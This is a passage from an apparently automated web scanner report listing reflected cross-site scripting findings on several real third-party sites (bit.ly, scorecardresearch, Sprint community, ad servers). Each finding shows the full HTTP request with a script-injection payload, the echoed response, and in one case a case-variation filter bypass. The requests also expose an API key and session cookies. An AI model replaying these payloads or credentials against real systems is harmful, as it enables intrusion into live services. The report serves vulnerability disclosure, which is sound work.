Unable to find /ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img src=a onerror=alert(1)>6709cddd430

5.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4 was submitted in the REST URL parameter 9. This input was echoed as 76672<img src=a onerror=alert(1)>2c03fb67eb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:20 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749b76672<img src=a onerror=alert(1)>2c03fb67eb4

5.27. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebb35<script>alert(1)</script>63fe973072f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sun, 04 Sep 2011 00:59:04 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f

5.28. http://api.bit.ly/shorten [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 75787<script>alert(1)</script>6092a370891 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL75787<script>alert(1)</script>6092a370891&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:09 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "5c2db80dd5e3e6ca46557b8c7b52447844cb349e"

processBitlyURL75787<script>alert(1)</script>6092a370891({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904": {"userHash": "qjnyKb", "shortKeywordUrl": "", "hash": "q7VV6y",
...[SNIP]...

5.29. http://api.bit.ly/shorten [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 6fd73<script>alert(1)</script>6c37e9d4b was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "e4aae6323c61daeb31d345afaa81c9ae9ccce2b8"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b": {"userHash": "ooSyTz", "shortKeywordUrl": "", "hash": "q1d6Wf", "shortCNAMEUrl": "http://reut.rs/ooSyTz", "shortUrl": "http://reut.rs/ooSyTz"}}, "statusCode": "OK"})

5.30. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<a>00081b2be27 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16106635923383291811_1315097306218&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904+36fdf<a>00081b2be27&appkey=prod.reuters.com&_=1315097329735 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16106635923383291811_1315097306218({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"36fdf<a>00081b2be27\" at 299" });

5.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 8ef90<script>alert(1)</script>12b53f97162 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=78ef90<script>alert(1)</script>12b53f97162&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:08 GMT
Date: Sun, 04 Sep 2011 01:11:08 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"78ef90<script>alert(1)</script>12b53f97162", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload b5525<script>alert(1)</script>cfd9ca8e7d0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=b5525<script>alert(1)</script>cfd9ca8e7d0&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:12 GMT
Date: Sun, 04 Sep 2011 01:11:12 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"b5525<script>alert(1)</script>cfd9ca8e7d0", c16:"", r:""});



5.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e62e9<script>alert(1)</script>9e2b676467b was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888e62e9<script>alert(1)</script>9e2b676467b&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:09 GMT
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888e62e9<script>alert(1)</script>9e2b676467b", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 91ca1<script>alert(1)</script>32419e9e9c1 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=291ca1<script>alert(1)</script>32419e9e9c1&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"291ca1<script>alert(1)</script>32419e9e9c1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 187f1<script>alert(1)</script>11f8c27111d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=187f1<script>alert(1)</script>11f8c27111d&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"187f1<script>alert(1)</script>11f8c27111d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload de650<script>alert(1)</script>9da77839bed was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=de650<script>alert(1)</script>9da77839bed&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"de650<script>alert(1)</script>9da77839bed", c6:"", c10:"", c15:"", c16:"", r:""});



5.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload bdb1a<script>alert(1)</script>b70cafdef9d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=bdb1a<script>alert(1)</script>b70cafdef9d&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"bdb1a<script>alert(1)</script>b70cafdef9d", c10:"", c15:"", c16:"", r:""});



5.38. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ec8"><script>alert(1)</script>c7d472a83b1 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3Q0MzY0MAc4NMmAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:22 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 857


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1" type="text/css">
...[SNIP]...

5.39. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:27 GMT
Server: Apache-Coyote/1.1
X-JAL: 21
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=155803 t=1315099167532475
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.40. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72004"%3balert(1)//f27891277f2 was submitted in the REST URL parameter 3. This input was echoed as 72004";alert(1)//f27891277f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless72004"%3balert(1)//f27891277f2/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:28 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=125450 t=1315099168721365
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
